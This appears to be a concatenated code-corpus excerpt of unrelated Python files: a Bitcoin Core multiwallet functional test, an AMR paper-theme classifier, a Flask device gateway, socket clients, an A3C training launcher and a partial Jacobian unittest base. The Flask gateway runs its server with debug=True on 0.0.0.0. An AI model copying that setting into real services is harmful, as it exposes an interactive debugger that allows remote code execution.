        in_wallet_dir = [w.replace('/', os.path.sep) for w in to_create]  # Wallets in the wallet dir
        in_wallet_dir.append('w7')  # w7 is not loaded or created, but will be listed by listwalletdir because w7_symlink
        to_create.append(os.path.join(self.options.tmpdir, 'extern/w6'))  # External, not in the wallet dir, so we need to avoid adding it to in_wallet_dir
        to_load = [self.default_wallet_name]
        if not self.options.descriptors:
            to_load.append('w8')
        wallet_names = to_create + to_load  # Wallet names loaded in the wallet
        in_wallet_dir += to_load  # The loaded wallets are also in the wallet dir

        self.start_node(0)
        for wallet_name in to_create:
            self.nodes[0].createwallet(wallet_name)
        for wallet_name in to_load:
            self.nodes[0].loadwallet(wallet_name)

        # An unreadable directory inside walletdir must only produce a scan
        # error, not break listwalletdir.
        os.mkdir(wallet_dir('no_access'))
        os.chmod(wallet_dir('no_access'), 0)
        try:
            with self.nodes[0].assert_debug_log(expected_msgs=['Error scanning']):
                walletlist = self.nodes[0].listwalletdir()['wallets']
        finally:
            # Need to ensure access is restored for cleanup
            os.chmod(wallet_dir('no_access'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
        assert_equal(sorted(map(lambda w: w['name'], walletlist)), sorted(in_wallet_dir))

        assert_equal(set(node.listwallets()), set(wallet_names))

        # should raise rpc error if wallet path can't be created
        err_code = -4 if self.options.descriptors else -1
        assert_raises_rpc_error(err_code, "boost::filesystem::create_directory:", self.nodes[0].createwallet, "w8/bad")

        # check that all requested wallets were created
        self.stop_node(0)
        for wallet_name in wallet_names:
            assert_equal(os.path.isfile(wallet_file(wallet_name)), True)

        self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
        self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
        self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())

        # Duplicate -wallet arguments are ignored with a warning, not fatal.
        self.start_node(0, ['-wallet=w1', '-wallet=w1'])
        self.stop_node(0, 'Warning: Ignoring duplicate -wallet w1.')

        if not self.options.descriptors:
            # Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
            # should not initialize if one wallet is a copy of another
            shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
            in_wallet_dir.append('w8_copy')
            exp_stderr = r"BerkeleyDatabase: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
            self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)

            # should not initialize if wallet file is a symlink
            os.symlink('w8', wallet_dir('w8_symlink'))
            self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)

        # should not initialize if the specified walletdir does not exist
        self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
        # should not initialize if the specified walletdir is not a directory
        not_a_dir = wallet_dir('notadir')
        open(not_a_dir, 'a', encoding="utf8").close()
        self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')

        self.log.info("Do not allow -upgradewallet with multiwallet")
        self.nodes[0].assert_start_raises_init_error(['-upgradewallet'], "Error: Error parsing command line arguments: Invalid parameter -upgradewallet")

        # if wallets/ doesn't exist, datadir should be the default wallet dir
        wallet_dir2 = data_dir('walletdir')
        os.rename(wallet_dir(), wallet_dir2)
        self.start_node(0)
        self.nodes[0].createwallet("w4")
        self.nodes[0].createwallet("w5")
        assert_equal(set(node.listwallets()), {"w4", "w5"})
        w5 = wallet("w5")
        node.generatetoaddress(nblocks=1, address=w5.getnewaddress())

        # now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
        os.rename(wallet_dir2, wallet_dir())
        self.restart_node(0, ['-nowallet', '-walletdir=' + data_dir()])
        self.nodes[0].loadwallet("w4")
        self.nodes[0].loadwallet("w5")
        assert_equal(set(node.listwallets()), {"w4", "w5"})
        w5 = wallet("w5")
        w5_info = w5.getwalletinfo()
        assert_equal(w5_info['immature_balance'], 50)

        # A second node must not be able to share node0's walletdir.
        competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
        os.mkdir(competing_wallet_dir)
        self.restart_node(0, ['-nowallet', '-walletdir=' + competing_wallet_dir])
        self.nodes[0].createwallet(self.default_wallet_name)
        if self.options.descriptors:
            exp_stderr = r"Error: SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another bitcoind?"
        else:
            exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\S*\"!"
        self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)

        self.restart_node(0)
        for wallet_name in wallet_names:
            self.nodes[0].loadwallet(wallet_name)

        assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))

        wallets = [wallet(w) for w in wallet_names]
        wallet_bad = wallet("bad")

        # check wallet names and balances
        node.generatetoaddress(nblocks=1, address=wallets[0].getnewaddress())
        for wallet_name, wallet in zip(wallet_names, wallets):
            info = wallet.getwalletinfo()
            assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
            assert_equal(info['walletname'], wallet_name)

        # accessing invalid wallet fails
        assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)

        # accessing wallet RPC without using wallet endpoint fails
        assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)

        w1, w2, w3, w4, *_ = wallets
        node.generatetoaddress(nblocks=101, address=w1.getnewaddress())
        assert_equal(w1.getbalance(), 100)
        assert_equal(w2.getbalance(), 0)
        assert_equal(w3.getbalance(), 0)
        assert_equal(w4.getbalance(), 0)

        # Funds sent between wallets are credited per-wallet after one block.
        w1.sendtoaddress(w2.getnewaddress(), 1)
        w1.sendtoaddress(w3.getnewaddress(), 2)
        w1.sendtoaddress(w4.getnewaddress(), 3)
        node.generatetoaddress(nblocks=1, address=w1.getnewaddress())
        assert_equal(w2.getbalance(), 1)
        assert_equal(w3.getbalance(), 2)
        assert_equal(w4.getbalance(), 3)

        # Batched RPC through a wallet endpoint stays on that wallet.
        batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
        assert_equal(batch[0]["result"]["chain"], self.chain)
        assert_equal(batch[1]["result"]["walletname"], "w1")

        self.log.info('Check for per-wallet settxfee call')
        assert_equal(w1.getwalletinfo()['paytxfee'], 0)
        assert_equal(w2.getwalletinfo()['paytxfee'], 0)
        w2.settxfee(0.001)
        assert_equal(w1.getwalletinfo()['paytxfee'], 0)
        assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))

        self.log.info("Test dynamic wallet loading")

        self.restart_node(0, ['-nowallet'])
        assert_equal(node.listwallets(), [])
        assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", node.getwalletinfo)

        self.log.info("Load first wallet")
        loadwallet_name = node.loadwallet(wallet_names[0])
        assert_equal(loadwallet_name['name'], wallet_names[0])
        assert_equal(node.listwallets(), wallet_names[0:1])
        node.getwalletinfo()
        w1 = node.get_wallet_rpc(wallet_names[0])
        w1.getwalletinfo()

        self.log.info("Load second wallet")
        loadwallet_name = node.loadwallet(wallet_names[1])
        assert_equal(loadwallet_name['name'], wallet_names[1])
        assert_equal(node.listwallets(), wallet_names[0:2])
        assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
        w2 = node.get_wallet_rpc(wallet_names[1])
        w2.getwalletinfo()

        self.log.info("Concurrent wallet loading")
        # Three threads hammer loadwallet/unloadwallet on the same wallet;
        # at least one must hit the 'already loading' collision.
        threads = []
        for _ in range(3):
            n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
            t = Thread(target=test_load_unload, args=(n, wallet_names[2], ))
            t.start()
            threads.append(t)
        for t in threads:
            t.join()
        global got_loading_error
        assert_equal(got_loading_error, True)

        self.log.info("Load remaining wallets")
        for wallet_name in wallet_names[2:]:
            loadwallet_name = self.nodes[0].loadwallet(wallet_name)
            assert_equal(loadwallet_name['name'], wallet_name)

        assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))

        # Fail to load if wallet doesn't exist
        path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallets")
        assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path), self.nodes[0].loadwallet, 'wallets')

        # Fail to load duplicate wallets
        path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w1", "wallet.dat")
        if self.options.descriptors:
            assert_raises_rpc_error(-4, "Wallet file verification failed. SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another bitcoind?", self.nodes[0].loadwallet, wallet_names[0])
        else:
            assert_raises_rpc_error(-4, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, wallet_names[0])

            # This tests the default wallet that BDB makes, so SQLite wallet doesn't need to test this
            # Fail to load duplicate wallets by different ways (directory and filepath)
            path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallet.dat")
            assert_raises_rpc_error(-4, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, 'wallet.dat')

            # Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
            # Fail to load if one wallet is a copy of another
            assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')

            # Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
            assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')

            # Fail to load if wallet file is a symlink
            assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')

        # Fail to load if a directory is specified that doesn't contain a wallet
        os.mkdir(wallet_dir('empty_wallet_dir'))
        path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "empty_wallet_dir")
        assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Data is not in recognized format.".format(path), self.nodes[0].loadwallet, 'empty_wallet_dir')

        self.log.info("Test dynamic wallet creation.")

        # Fail to create a wallet if it already exists.
        path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w2")
        assert_raises_rpc_error(-4, "Failed to create database path '{}'. Database already exists.".format(path), self.nodes[0].createwallet, 'w2')

        # Successfully create a wallet with a new name
        loadwallet_name = self.nodes[0].createwallet('w9')
        in_wallet_dir.append('w9')
        assert_equal(loadwallet_name['name'], 'w9')
        w9 = node.get_wallet_rpc('w9')
        assert_equal(w9.getwalletinfo()['walletname'], 'w9')

        assert 'w9' in self.nodes[0].listwallets()

        # Successfully create a wallet using a full path
        new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
        new_wallet_name = os.path.join(new_wallet_dir, 'w10')
        loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
        assert_equal(loadwallet_name['name'], new_wallet_name)
        w10 = node.get_wallet_rpc(new_wallet_name)
        assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)

        assert new_wallet_name in self.nodes[0].listwallets()

        self.log.info("Test dynamic wallet unloading")

        # Test `unloadwallet` errors
        assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
        assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
        assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
        assert_raises_rpc_error(-8, "RPC endpoint wallet and wallet_name parameter specify different wallets", w1.unloadwallet, "w2"),

        # Successfully unload the specified wallet name
        self.nodes[0].unloadwallet("w1")
        assert 'w1' not in self.nodes[0].listwallets()

        # Unload w1 again, this time providing the wallet name twice
        self.nodes[0].loadwallet("w1")
        assert 'w1' in self.nodes[0].listwallets()
        w1.unloadwallet("w1")
        assert 'w1' not in self.nodes[0].listwallets()

        # Successfully unload the wallet referenced by the request endpoint
        # Also ensure unload works during walletpassphrase timeout
        w2.encryptwallet('test')
        w2.walletpassphrase('test', 1)
        w2.unloadwallet()
        time.sleep(1.1)
        assert 'w2' not in self.nodes[0].listwallets()

        # Successfully unload all wallets
        for wallet_name in self.nodes[0].listwallets():
            self.nodes[0].unloadwallet(wallet_name)
        assert_equal(self.nodes[0].listwallets(), [])
        assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", self.nodes[0].getwalletinfo)

        # Successfully load a previously unloaded wallet
        self.nodes[0].loadwallet('w1')
        assert_equal(self.nodes[0].listwallets(), ['w1'])
        assert_equal(w1.getwalletinfo()['walletname'], 'w1')

        assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))

        # Test backing up and restoring wallets
        self.log.info("Test wallet backup")
        self.restart_node(0, ['-nowallet'])
        for wallet_name in wallet_names:
            self.nodes[0].loadwallet(wallet_name)
        for wallet_name in wallet_names:
            rpc = self.nodes[0].get_wallet_rpc(wallet_name)
            addr = rpc.getnewaddress()
            backup = os.path.join(self.options.tmpdir, 'backup.dat')
            if os.path.exists(backup):
                os.unlink(backup)
            rpc.backupwallet(backup)
            # Replace the wallet with an empty one: addr is no longer ours...
            self.nodes[0].unloadwallet(wallet_name)
            shutil.copyfile(empty_created_wallet if wallet_name == self.default_wallet_name else empty_wallet, wallet_file(wallet_name))
            self.nodes[0].loadwallet(wallet_name)
            assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
            # ...then restore the backup: addr is ours again.
            self.nodes[0].unloadwallet(wallet_name)
            shutil.copyfile(backup, wallet_file(wallet_name))
            self.nodes[0].loadwallet(wallet_name)
            assert_equal(rpc.getaddressinfo(addr)['ismine'], True)

        # Test .walletlock file is closed
        self.start_node(1)
        wallet = os.path.join(self.options.tmpdir, 'my_wallet')
        self.nodes[0].createwallet(wallet)
        if self.options.descriptors:
            assert_raises_rpc_error(-4, "Unable to obtain an exclusive lock", self.nodes[1].loadwallet, wallet)
        else:
            assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
        self.nodes[0].unloadwallet(wallet)
        self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
    # Standard functional-test entry point.
    MultiWalletTest().main()
|
k_means.py | import random
import time
from amr_categories.Animals import Animals
from amr_categories.CleanWater import CleanWater
from amr_categories.Environment import Environment
from amr_categories.FoodSafety import FoodSafety
from amr_categories.HumanConsumption import HumanConsumption
from amr_categories.HumanIPC import HumanIPC
from amr_categories.Plants import Plants
from amr_categories.RAndD import RAndD
from data.PaperCache import PaperCache
from multiprocessing import Process
def populate_parallel(pc, paper_id, themes_class_dict):
    """Compute the two highest-weighted AMR themes for one paper and persist them.

    Args:
        pc: PaperCache-like object; ``update_theme(paper_id, primary, secondary)``
            is called with the ranking result.
        paper_id: paper identifier (must be convertible to int for the
            progress print below).
        themes_class_dict: mapping of theme name -> theme object exposing
            ``get_weighting_theme_from_paper_id(paper_id)``.
    """
    # Start from a zero weight for every known theme so that any theme missing
    # from themes_class_dict still takes part in the ranking (with weight 0).
    theme_dict = {'ipc': 0, 'consumption': 0, 'water': 0, 'environment': 0,
                  'food': 0, 'animals': 0, 'plants': 0, 'randd': 0}
    for key, theme in themes_class_dict.items():
        theme_dict[key] = theme.get_weighting_theme_from_paper_id(paper_id)
    # Rank theme names by weight, highest first (stable sort keeps insertion
    # order for equal weights, matching the previous behaviour).
    sorted_themes = [name for name, _ in
                     sorted(theme_dict.items(), key=lambda item: item[1], reverse=True)]
    if int(paper_id) % 100 == 0:
        print(paper_id)  # lightweight progress indicator
    primary_theme = sorted_themes[0]
    secondary_theme = sorted_themes[1]
    pc.update_theme(paper_id, primary_theme, secondary_theme)
def kth_nn(theme, pc):
    """Return the 100 top-weighted keywords over all papers of a theme.

    Args:
        theme: theme object; ``set_all_papers_primary_database()`` is called
            first to populate ``theme.all_papers`` (dicts with an 'ID' key).
        pc: PaperCache-like object whose ``get_keywords_from_paper_id`` returns
            dicts with 'KEYWORD' and 'WEIGHT' keys.

    Returns:
        List of at most 100 keyword strings, sorted by accumulated weight,
        highest first (ties keep first-seen order).
    """
    theme.set_all_papers_primary_database()
    # Accumulate each keyword's weight across every paper of the theme.
    weights = {}
    for paper in theme.all_papers:
        for keyword in pc.get_keywords_from_paper_id(paper.get('ID')):
            name = keyword.get('KEYWORD')
            weights[name] = weights.get(name, 0) + keyword.get('WEIGHT')
    ranked = sorted(weights.items(), key=lambda item: item[1], reverse=True)
    return [name for name, _ in ranked[:100]]
def populate_theme():
    """Recompute primary/secondary themes for every cached paper.

    NOTE(review): the unconditional ``exit()`` below stops the function right
    after printing the regenerated keyword lists, so the multiprocessing
    section that follows is currently dead code -- confirm whether that is
    intended (looks like a debugging cut-off).
    """
    pc = PaperCache()
    all_papers = pc.get_all_papers()
    # One classifier instance per AMR theme, keyed by short theme name.
    themes = {'ipc': HumanIPC(), 'consumption': HumanConsumption(),
              'water': CleanWater(), 'environment': Environment(),
              'food': FoodSafety(), 'animals': Animals(), 'plants': Plants(),
              'randd': RAndD()}
    processes = []
    index = 0
    process_num = 40  # initial degree of parallelism; adapted below
    # Current keyword list per theme, printed for comparison.
    prev_keywords = {k: themes.get(k).theme_keywords for k in themes.keys()}
    print(prev_keywords)
    # Regenerate keyword lists from the papers currently assigned to each theme.
    new_keywords = {k: kth_nn(themes.get(k), pc) for k in themes.keys()}
    for key in new_keywords.keys():
        print(key)
        print(new_keywords.get(key))
    exit()  # execution stops here -- everything below is unreachable (see docstring)
    prev_time = [1000000]  # sentinel so the first timing comparison always succeeds
    start_time = time.time()
    for paper in all_papers:
        # NOTE(review): each paper is classified twice -- once synchronously
        # here and once in the subprocess below; the synchronous call looks
        # like leftover debug code. Confirm before removing.
        populate_parallel(pc, paper.get('ID'), themes)
        p = Process(target=populate_parallel, args=(pc, paper.get('ID'), themes))
        p.start()
        processes.append(p)
        index = index + 1
        if index % process_num == 0:
            index = 0
            for process in processes:
                process.join()
            elapsed_time = time.time() - start_time
            # Simple hill-climbing with random exploration: grow the pool when
            # per-process time improved (or on a coin flip), shrink otherwise.
            if float(elapsed_time) / float(process_num) <= min(prev_time) or random.randrange(0, 2) == 1:
                process_num += 1
            else:
                process_num -= 1
            prev_time = [min(prev_time), float(elapsed_time) / float(process_num)]
            start_time = time.time()
            print(process_num)
            processes = []
populate_theme()
|
gateway.py |
#!/usr/bin/env python
from flask import Flask, render_template, Response, request
from flask_cors import CORS, cross_origin
from flask import json
import random
import serial_devices
import threading
import logging
# Raspberry Pi camera module (requires picamera package)
# from camera_pi import Camera
app = Flask(__name__)
CORS(app)
@app.route('/')
def index():
    """Serve the single-page UI from templates/index.html."""
    return render_template('index.html')
@app.route('/devices')
def devices():
    """Return the current state of all simulated serial devices as JSON."""
    return json.jsonify(serial_devices.get_device_data())
@app.route('/send_signal')
def send_signal_to_device():
    """Forward a text command to one simulated device.

    Query params: ``id`` (device identifier) and ``message`` (payload).

    NOTE(review): catching NameError to mean "unknown device" is suspicious --
    a missing device would more plausibly raise KeyError/LookupError. Confirm
    what serial_devices.send_signal actually raises for a bad id.
    """
    try:
        device_id = request.args.get('id')
        message = request.args.get('message')
        serial_devices.send_signal(device_id, message)
        return "Signal '%s' sent to %s" % (message, device_id)
    except NameError as e:
        return "No such devices specified"
@app.route('/add_device')
def add_device():
    """Create a new simulated device of the requested kind.

    Query param ``type`` must be one of gyro/temp/pressure/led; any other
    value yields a 404. Response texts are unchanged.
    """
    # Renamed local from `type` so it no longer shadows the builtin.
    device_type = request.args.get('type', '')
    if device_type in ('gyro', 'temp', 'pressure', 'led'):
        serial_devices.add_device(device_type)
        return "Device of %s created" % device_type
    else:
        return "Not a valid type", 404
if __name__ == '__main__':
    # Run the device simulation in a background daemon thread so it dies
    # together with the web-server process.
    th = threading.Thread(target=serial_devices.run_simulation)
    th.daemon = True
    th.start()
    # threaded=True lets Flask serve concurrent requests; debug=True enables
    # the reloader/debugger (not suitable for production).
    app.run(host='0.0.0.0', debug=True, threaded=True)
|
TCP_client.py | import socket
import time
import threading
import random
HOST = '127.0.0.1'  # The server's hostname or IP address
PORT = 22244  # The port used by the server
server_addr = (HOST,PORT)
# Payloads sent in order by each client thread; b'KRAJ' ("END") is the
# terminator the server echoes back to close the exchange.
messages = [b'Message 1 from client.', b'Message 2 from client.',b'Message 3 from client.',b'KRAJ']
def spoji(tid):
    """Connect to the server, send all messages with pauses, then read replies.

    Args:
        tid: thread index; also used as a staggered start delay in seconds.

    Fixes vs. the original:
    - the four copy-pasted send blocks are collapsed into one loop;
    - the receive loop now exits when the peer closes the connection
      (``recv`` returning ``b''`` previously caused an infinite busy loop);
    - the socket is closed on the way out instead of being leaked.
    """
    print('starting connection to', server_addr)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    time.sleep(tid)  # stagger thread start-up by the thread id
    sock.connect_ex(server_addr)
    print('Thread', tid, 'otvorio:', sock.getsockname())
    for msg in messages:
        time.sleep(random.randint(1, 2))
        print('sending', msg, 'to connection',
              server_addr, ' fromthread: ', tid)
        sock.send(msg)
    while True:
        recv_data = sock.recv(1024)
        if not recv_data:
            # Peer closed the connection; the original spun forever here.
            break
        print('received', repr(recv_data), 'to thread', tid)
        if recv_data[-4:] == b'KRAJ':
            print('Završi thread', tid)
            break
    sock.close()
brojac = 1  # thread counter ("brojac" = counter)
tlista = []  # keep references so the threads can be inspected/joined later
# Start two client threads (ids 1 and 2); each delays its connect by its id.
while brojac < 3:
    tlista.append(threading.Thread(target=spoji, args=(brojac,)))
    tlista[len(tlista)-1].start()
    brojac += 1
|
client_message.py | import threading
import socket
host = '127.0.0.1'  # chat server address
port = 55554  # chat server port
receive = False  # module-level flag: flipped to True once a chat message arrived
message = ''  # module-level buffer holding the last received message
def start_chat():
    """Connect to the chat server and start reader/writer threads.

    Side effects (kept from the original, other code reads them): stores the
    last received text in the module-level ``message`` and flips the
    module-level ``receive`` flag to True.
    """
    nickname = "Text Holder"
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect((host, port))

    def reader():
        # Renamed from `receive`: the nested function used to shadow the very
        # module-level `receive` flag it writes to.
        global message, receive
        while True:
            try:
                message = client.recv(1024).decode('ascii')
                if message == "NICK":
                    # Server handshake: reply with our nickname.
                    client.send(nickname.encode('ascii'))
                else:
                    receive = True
            except Exception:
                # Narrowed from a bare `except:` so KeyboardInterrupt and
                # SystemExit are no longer swallowed.
                print("error occurred")
                client.close()
                break

    def writer():
        while True:
            # Local variable (the original shadowed the global `message` here
            # without declaring it global, so the global was never touched).
            text = f'{nickname}: {input("")}'
            client.send(text.encode('ascii'))

    receive_thread = threading.Thread(target=reader)
    receive_thread.start()
    write_thread = threading.Thread(target=writer)
    write_thread.start()
|
main.py | from __future__ import print_function
import argparse
import os
import torch
import torch.multiprocessing as mp
import my_optim
from envs import create_atari_env
from model import ActorCritic
from test import test
from train import train
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Training settings
# All defaults are unchanged; only help strings that contradicted the actual
# defaults (copy-paste leftovers) are corrected.
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument('--lr', type=float, default=0.0001,
                    help='learning rate (default: 0.0001)')
parser.add_argument('--gamma', type=float, default=0.99,
                    help='discount factor for rewards (default: 0.99)')
parser.add_argument('--gae-lambda', type=float, default=1.00,
                    help='lambda parameter for GAE (default: 1.00)')
parser.add_argument('--entropy-coef', type=float, default=0.01,
                    help='entropy term coefficient (default: 0.01)')
parser.add_argument('--value-loss-coef', type=float, default=0.5,
                    help='value loss coefficient (default: 0.5)')
parser.add_argument('--max-grad-norm', type=float, default=50,
                    help='gradient clipping norm (default: 50)')  # help said "value loss coefficient"
parser.add_argument('--seed', type=int, default=1,
                    help='random seed (default: 1)')
parser.add_argument('--num-processes', type=int, default=8,
                    help='how many training processes to use (default: 8)')  # help said 4
parser.add_argument('--num-steps', type=int, default=5,
                    help='number of forward steps in A3C (default: 5)')  # help said 20
parser.add_argument('--max-episode-length', type=int, default=1000000,
                    help='maximum length of an episode (default: 1000000)')
parser.add_argument('--env-name', default='PongDeterministic-v4',
                    help='environment to train on (default: PongDeterministic-v4)')
parser.add_argument('--no-shared', default=True,
                    help='use an optimizer without shared momentum.')
if __name__ == '__main__':
    # Hogwild-style A3C: one shared model, one test process, N train processes.
    mp.set_start_method("spawn")
    os.environ['OMP_NUM_THREADS'] = '1'  # one OpenMP thread per process
    os.environ['CUDA_VISIBLE_DEVICES'] = ""  # hide all GPUs: CPU-only training
    args = parser.parse_args()
    torch.manual_seed(args.seed)
    env = create_atari_env(args.env_name)
    # Model placed in shared memory so all processes update the same weights.
    shared_model = ActorCritic(
        env.observation_space.shape[0], env.action_space)
    shared_model.share_memory()
    if args.no_shared:
        optimizer = None  # each train() then builds its own local optimizer
    else:
        optimizer = my_optim.SharedAdam(shared_model.parameters(), lr=args.lr)
        optimizer.share_memory()
    processes = []
    counter = mp.Value('i', 0)  # global step counter shared across processes
    lock = mp.Lock()
    # One evaluation process (rank passed as num_processes)...
    p = mp.Process(target=test, args=(args.num_processes, args, shared_model, counter))
    p.start()
    processes.append(p)
    # ...plus num_processes training processes.
    for rank in range(0, args.num_processes):
        p = mp.Process(target=train, args=(rank, args, shared_model, counter, lock, optimizer))
        p.start()
        processes.append(p)
    for p in processes:
        p.join()
|
abstract_jacobian_unit_test.py | '''
Copyright 2022 Airbus SAS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
'''
mode: python; py-indent-offset: 4; tab-width: 4; coding: utf-8
'''
import unittest
from abc import ABC, abstractmethod
import inspect
import glob
from importlib import import_module
from os.path import join, basename, dirname
import os
from sos_trades_core.api import get_sos_logger
from multiprocessing import Process
from gemseo.core.discipline import MDODiscipline
PROCESS_IN_PARALLEL = 5
class AbstractJacobianUnittest(unittest.TestCase, ABC):
    """Base class for unit tests that check analytic Jacobians against
    reference pickles (dumped once, then reloaded for regression testing).
    """
    # When True, check_jacobian() dumps reference pickles instead of loading them.
    DUMP_JACOBIAN = False
    # Sub-directory (next to the test file) holding the reference pickles.
    PICKLE_DIRECTORY = 'jacobian_pkls'

    def generate_analytic_gradient_pickle(self, test_names=None):
        """Run the jacobian test entries and force a dump of their pickles.

        Args:
            test_names: optional list of substrings; when non-empty, only
                entries whose repr contains one of them are executed.
                (Was a mutable default ``[]``; None now means "run all".)
        """
        test_names = test_names or []
        local_logger = get_sos_logger('SoS.EE')
        jacobian_test_entries = self.analytic_grad_entry()
        for entry in jacobian_test_entries:
            # Filter entries by name when a filter list was supplied.
            is_in_list = False
            if len(test_names) > 0:
                for test_name in test_names:
                    if test_name in str(entry):
                        is_in_list = True
            else:
                is_in_list = True
            if not is_in_list:
                continue
            try:
                local_logger.info(
                    f'Jacobian launched on {str(entry)}')
                self.setUp()
                AbstractJacobianUnittest.DUMP_JACOBIAN = True
                entry()
            except Exception:
                # Keep going so one failing entry does not block the others.
                local_logger.exception(
                    f'Jacobian fail on {str(entry)}')

    @abstractmethod
    def analytic_grad_entry(self):
        """Return the list of jacobian test callables to dump (must be overloaded)."""
        raise TypeError('test_analytic_gradient must be overloaded')

    def check_jacobian(self, location, filename, discipline, inputs, outputs, step=1e-15, derr_approx='complex_step', input_column=None, output_column=None, threshold=1e-8, parallel=False,
                       n_processes=5, linearization_mode='auto', directory=PICKLE_DIRECTORY):
        """Wrapper around discipline.check_jacobian that switches between
        dumping (DUMP_JACOBIAN=True) and loading the reference pickle.
        """
        # Never request more processes than the machine provides.
        if n_processes > MDODiscipline.N_CPUS:
            n_processes = MDODiscipline.N_CPUS
        local_logger = get_sos_logger('SoS.EE')
        file_path = join(location, directory,
                         filename)
        if AbstractJacobianUnittest.DUMP_JACOBIAN:
            local_logger.info(
                f'Jacobian dump mode enable on {join(location, filename)}')
            check_flag = discipline.check_jacobian(step=step, inputs=inputs,
                                                   outputs=outputs, derr_approx=derr_approx,
                                                   dump_jac_path=file_path, input_column=input_column, output_column=output_column, parallel=parallel,
                                                   n_processes=n_processes, linearization_mode=linearization_mode)
        else:
            check_flag = discipline.check_jacobian(step=step, inputs=inputs,
                                                   outputs=outputs, derr_approx=derr_approx,
                                                   load_jac_path=file_path, input_column=input_column, output_column=output_column, parallel=parallel,
                                                   n_processes=n_processes, linearization_mode=linearization_mode)
        self.assertTrue(check_flag, msg=f"Wrong gradient in {discipline.get_disc_full_name()}")

    @staticmethod
    def launch_all_pickle_generation(root_module, file_regex='l1*.py', directories=None, test_names=None):
        """Find jacobian tests matching file_regex under root_module, regenerate
        their pickles in batches of PROCESS_IN_PARALLEL subprocesses, then
        git-add/commit/push the resulting pickle files.

